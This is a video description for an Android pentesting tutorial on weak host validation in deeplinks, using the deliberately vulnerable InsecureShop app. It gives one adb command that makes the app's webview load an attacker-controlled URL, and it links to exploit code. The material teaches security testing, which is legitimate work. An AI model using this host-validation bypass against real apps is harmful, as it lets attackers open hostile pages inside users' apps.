Android Weak Host Validation | Android Pentesting

Поделиться
HTML-код
  • Опубликовано: 21 июл 2021
  • Deeplink and Weak Host Validation
    In this part we're going to see how weak host validation would lead to opening an attacker controlled URL in the application's webview.
    Running Exploit Through ADB :
    adb shell am start -W -a android.intent.action.VIEW -d "insecureshop://com.insecureshop/webview?url=aseemshrey.in/#insecureshopapp.com"
    ▬▬▬▬▬▬ 🔗 Links ▬▬▬▬▬▬
    Download APK : github.com/optiv/InsecureShop
    Challenge Link : docs.insecureshopapp.com/inse...
    Exploit Gist : gist.github.com/LuD1161/9ebbe...
    Hosted Exploit : bl.ocks.org/LuD1161/raw/9ebbe...
    ▬▬▬▬▬▬ 🔗 Other Links ▬▬▬▬▬▬
    💸 $100 Digital Ocean referral link :💸
    m.do.co/c/5e8e8b6c9c39
    Google FeedBack Form : forms.gle/rA9oy5wqN5GSLkh8A
    Discord : / discord
    Subreddit : / hackingsimplified
    Telegram : t.me/hackingsimplified42
    Hope it was worth your time.
    Stay tuned.
    Thank you everyone :)
    ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
    Disclaimer :
    These materials are for educational and research purposes only.
    Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! The creator of this video, nor anyone else affiliated in any way, is going to accept responsibility for your actions.
    ------------------------------------------------------------------------------------------------------------------------
    #Android #HackingSimplified #Hacking #beTheHACR #websecurity #howtohack #hack #howtobeahacker #hackingCourse #bugBounty #bug #bounty #hacker #freeHacking #freecourse
    hacking ,HackingSimplified, Hacking Simplified, Start Hacking ,Be The HACR, web security, how to be a hacker, free hacking, free hacking course, web security,hacking Course,bug Bounty,hacker,bug bounty,cyber security,bug bounty hunting

Комментарии • 14